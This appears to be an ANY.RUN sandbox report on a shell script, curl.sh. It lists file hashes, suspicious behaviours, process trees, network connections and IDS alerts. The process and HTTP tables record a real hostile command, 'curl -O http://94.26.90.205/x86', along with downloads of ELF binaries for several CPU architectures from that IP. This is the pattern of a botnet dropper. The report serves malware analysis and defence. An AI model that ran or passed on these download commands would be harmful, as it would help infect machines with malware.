Malware analysis curl.sh Malicious activity | ANY.RUN

Add for printing

File name:	curl.sh
Full analysis:	https://app.any.run/tasks/d7aa92a2-21cc-4c23-9c49-8a303c37b367
Verdict:	Malicious activity
Analysis date:	April 29, 2025, 13:19:44
OS:	Ubuntu 22.04.2
MIME:	text/plain
File info:	ASCII text, with CRLF line terminators
MD5:	B4F61BAB4CE9F874F1C6C886BE0C5B3F
SHA1:	9645EB5C4FED2E2DB57BA8F948A76310515696CF
SHA256:	E4B9E29BB0CD111FD120ED492AA889556DD9CAB4B8AB16B230F7EEA589749579
SSDEEP:	12:7i2oVeeb2oVDMVR2oV12oVxPi2oVzNIh5sL2oVAKLKmn:S4Mt+BjPmNNIfmhKm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Check the Environment Variables Related to System Identification (os-release)
  - curl (PID: 39569)
  - curl (PID: 39502)
  - curl (PID: 39540)
  - curl (PID: 39623)
  - curl (PID: 39651)
  - curl (PID: 39596)
- Executes commands using command-line interpreter
  - sudo (PID: 39498)
- Modifies file or directory owner
  - sudo (PID: 39495)
- Reads passwd file
  - dumpe2fs (PID: 39524)
  - dumpe2fs (PID: 39532)
  - curl (PID: 39596)
  - curl (PID: 39651)
  - curl (PID: 39623)
  - curl (PID: 39502)
  - curl (PID: 39540)
  - curl (PID: 39569)
- Executes the "rm" command to delete files or directories
  - bash (PID: 39499)
- Reads /proc/mounts (likely used to find writable filesystems)
  - curl (PID: 39540)
  - curl (PID: 39623)
  - curl (PID: 39596)
  - curl (PID: 39651)
  - curl (PID: 39569)
- Potential Corporate Privacy Violation
  - curl (PID: 39502)
  - curl (PID: 39540)
  - curl (PID: 39596)
  - curl (PID: 39569)
  - curl (PID: 39623)
  - curl (PID: 39651)
- Connects to the server without a host name
  - curl (PID: 39540)
  - curl (PID: 39623)
  - curl (PID: 39569)
  - curl (PID: 39651)
  - curl (PID: 39596)
INFO
- Checks timezone
  - dumpe2fs (PID: 39524)
  - dumpe2fs (PID: 39532)
- Creates file in the temporary folder
  - curl (PID: 39502)
  - curl (PID: 39596)
  - curl (PID: 39623)
  - curl (PID: 39651)
  - curl (PID: 39540)
  - curl (PID: 39569)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

272

Monitored processes

51

Malicious processes

4

Suspicious processes

5

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
39494	/bin/sh -c "sudo chown user /tmp/curl\.sh && chmod +x /tmp/curl\.sh && DISPLAY=:0 sudo -iu user /tmp/curl\.sh "	/usr/bin/dash	—	any-guest-agent
User: root Integrity Level: UNKNOWN Exit code: 32512
39495	sudo chown user /tmp/curl.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
39496	chown user /tmp/curl.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
39497	chmod +x /tmp/curl.sh	/usr/bin/chmod	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
39498	sudo -iu user /tmp/curl.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 32512
39499	-bash --login -c \/tmp\/curl\.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 32512
39500	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
39501	rm -rf x86	/usr/bin/rm	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
39502	/snap/curl/1754/bin/curl -O http://94.26.90.205/x86	/snap/curl/1754/bin/curl		bash
User: user Integrity Level: UNKNOWN Exit code: 0
39514	/snap/snapd/20290/usr/lib/snapd/snap-seccomp version-info	/snap/snapd/20290/usr/lib/snapd/snap-seccomp	—	curl
User: user Integrity Level: UNKNOWN Exit code: 0

Add for printing

Executable files

0

Suspicious files

0

Text files

0

Unknown types

0

Dropped files

No data

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

7

TCP/UDP connections

16

DNS requests

10

Threats

12

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	91.189.91.48:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
39502	curl	GET	200	94.26.90.205:80	http://94.26.90.205/x86	unknown	—	—	unknown
39540	curl	GET	200	94.26.90.205:80	http://94.26.90.205/mips	unknown	—	—	unknown
39569	curl	GET	200	94.26.90.205:80	http://94.26.90.205/mipsel	unknown	—	—	unknown
39596	curl	GET	200	94.26.90.205:80	http://94.26.90.205/arm5	unknown	—	—	unknown
39651	curl	GET	200	94.26.90.205:80	http://94.26.90.205/arm7	unknown	—	—	unknown
39623	curl	GET	200	94.26.90.205:80	http://94.26.90.205/arm6	unknown	—	—	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	91.189.91.49:80	—	Canonical Group Limited	US	unknown
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	195.181.175.40:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
—	—	91.189.91.48:80	—	Canonical Group Limited	US	unknown
—	—	185.125.188.54:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
—	—	185.125.188.55:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
39502	curl	94.26.90.205:80	—	Deutsche Telekom AG	GB	unknown
39540	curl	94.26.90.205:80	—	Deutsche Telekom AG	GB	unknown
39569	curl	94.26.90.205:80	—	Deutsche Telekom AG	GB	unknown
39596	curl	94.26.90.205:80	—	Deutsche Telekom AG	GB	unknown

DNS requests

Domain	IP	Reputation
odrs.gnome.org	195.181.175.40 207.211.211.26 195.181.170.18 37.19.194.80 212.102.56.179 169.150.255.181 169.150.255.184 2a02:6ea0:c700::21 2a02:6ea0:c700::11 2a02:6ea0:c700::101 2a02:6ea0:c700::107 2a02:6ea0:c700::112 2a02:6ea0:c700::19 2a02:6ea0:c700::18	whitelisted
google.com	172.217.16.206 2a00:1450:4001:801::200e	whitelisted
api.snapcraft.io	185.125.188.54 185.125.188.58 185.125.188.59 185.125.188.55 2620:2d:4000:1010::42 2620:2d:4000:1010::6d 2620:2d:4000:1010::117 2620:2d:4000:1010::344	whitelisted
9.100.168.192.in-addr.arpa	—	unknown
connectivity-check.ubuntu.com	2001:67c:1562::24 2620:2d:4000:1::2b 2620:2d:4000:1::96 2001:67c:1562::23 2620:2d:4002:1::197 2620:2d:4000:1::97 2620:2d:4000:1::22 2620:2d:4000:1::23 2620:2d:4000:1::98 2620:2d:4000:1::2a 2620:2d:4002:1::198 2620:2d:4002:1::196	whitelisted

Threats

PID	Process	Class	Message
39502	curl	Potentially Bad Traffic	ET HUNTING curl User-Agent to Dotted Quad
39502	curl	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
39540	curl	Potentially Bad Traffic	ET HUNTING curl User-Agent to Dotted Quad
39540	curl	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
39569	curl	Potentially Bad Traffic	ET HUNTING curl User-Agent to Dotted Quad
39569	curl	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
39596	curl	Potentially Bad Traffic	ET HUNTING curl User-Agent to Dotted Quad
39596	curl	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
39623	curl	Potentially Bad Traffic	ET HUNTING curl User-Agent to Dotted Quad
39623	curl	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP

Add for printing

No debug info

General Info

curl.sh

B4F61BAB4CE9F874F1C6C886BE0C5B3F

9645EB5C4FED2E2DB57BA8F948A76310515696CF

E4B9E29BB0CD111FD120ED492AA889556DD9CAB4B8AB16B230F7EEA589749579

12:7i2oVeeb2oVDMVR2oV12oVxPi2oVzNIh5sL2oVAKLKmn:S4Mt+BjPmNNIfmhKm

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

SUSPICIOUS

Check the Environment Variables Related to System Identification (os-release)

Executes commands using command-line interpreter

Modifies file or directory owner

Reads passwd file

Executes the "rm" command to delete files or directories

Reads /proc/mounts (likely used to find writable filesystems)

Potential Corporate Privacy Violation

Connects to the server without a host name

INFO

Checks timezone

Creates file in the temporary folder

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings